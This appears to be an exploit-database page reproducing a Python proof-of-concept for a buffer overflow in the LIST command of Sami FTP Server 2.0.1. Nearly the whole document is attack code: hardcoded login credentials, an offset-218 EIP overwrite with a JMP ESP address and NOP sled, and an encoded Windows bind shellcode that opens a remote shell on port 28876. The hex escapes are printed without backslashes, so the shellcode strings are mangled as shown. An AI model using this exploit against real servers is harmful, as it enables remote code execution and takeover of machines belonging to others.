Sami FTP Server 2.0.1 LIST Command Buffer Overflow

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Sami FTP Server 2.0.1 LIST Command Buffer Overflow
# Published : 2013-03-01
# Author :
# Previous Title : BigAnt Server DUPF Command Arbitrary File Upload
# Next Title : OpenEMR PHP File Upload Vulnerability

#!/usr/bin/env python

# Exploit Title: Sami FTP LIST buffer overflow
# Date: 27 Feb 2013
# Exploit Author: superkojiman - http://www.techorganic.com
# Vendor Homepage: http://www.karjasoft.com/old.php
# Version: Sami FTP Server 2.0.1
# Tested on: Windows XP Pro SP1, English
#            Windows XP Pro SP2, English
#
# Description: 
# A buffer overflow is triggered when a long LIST command is sent to the 
# server and the user views the Log tab. 
#

from socket import *
import struct, sys

IP = sys.argv[1]

# Windows bind shellcode from https://code.google.com/p/w32-bind-ngs-shellcode/
# Remove bad chars using msfencode: 
# msfencode -b "x00x0ax0dx2f" -i w32-bind-ngs-shellcode.bin 
# [*] x86/shikata_ga_nai succeeded with size 241 (iteration=1)
shellcode = (
"xd9xc7xbex4dxa5xdex30xd9x74x24xf4x5fx2bxc9" +
"xb1x36x31x77x19x03x77x19x83xc7x04xafx50xef" +
"xf9x4bx10x61xcax18x50x8exa1x68x81x05xdbx9c" +
"x32x67x04x17x72xa0x0bx3fx0ex23xc2x57xc2x9c" +
"xd6x95x4ax45x4fxaexf9xe1xd8xdfxf7x69xafx39" +
"xb2x89x99x09x94x41x50x76x31xaaxc9x39xefx0c" +
"x5fxeex5ex0cxb0x3cxc5x5dxc4x61x39xe9x86x84" +
"x39xecxddx3dxf2xcex20xa8x53x3exf1x68xd7x74" +
"x64x6dx09xc0xb0xc1xe1x58x95xddx36xeax90x2a" +
"x7cx2bx2ex3fxdfxb8x9bx9bxe1x57x14x54xf5xf6" +
"xa0xd1xeaxf9x5fx6cxfaxf9x9bxffx50x7dx9dxf6" +
"xd3x76x6fx56x18xd4x90xb6x77x4fxeex08x0bx1a" +
"x5ex2ax46x1bx70x7fx67x34xe4xfexb7x4bxf8x8f" +
"xfbxd9x17xd8x56x48xe7x36x2dxb3x63x4ex1fxe6" +
"xdexc6x03x6bxbbx36x49x0fx67x0exfax5bxccxa8" +
"xbbx72x12x60xc3xb9x31xdfx99x93x6bx19x5axfb" +
"x84xf2x37x51xc2xaex48x03x08xc5xf1x50x39x13" +
"x02x57x45"
)

# EIP overwritten at offset 218
# JMP ESP at 10028283 C:Program FilesPMSystemTemptmp0.dll (Universal)
buf = "A" * 218 + struct.pack("<I", 0x10028283) + "x90" * 37 + shellcode

s = socket(AF_INET, SOCK_STREAM)
s.connect((IP,21))
print s.recv(1024)

s.send("USER superkojimanrn")
print s.recv(1024)

s.send("PASS letmeinrn")
print s.recv(1024)

print "[+] sending payload of size", len(buf)
s.send("LIST " + buf + "rn")
print s.recv(1024)

s.close()
print "[+] sent. Connect to %s on port 28876" % (sys.argv[1],)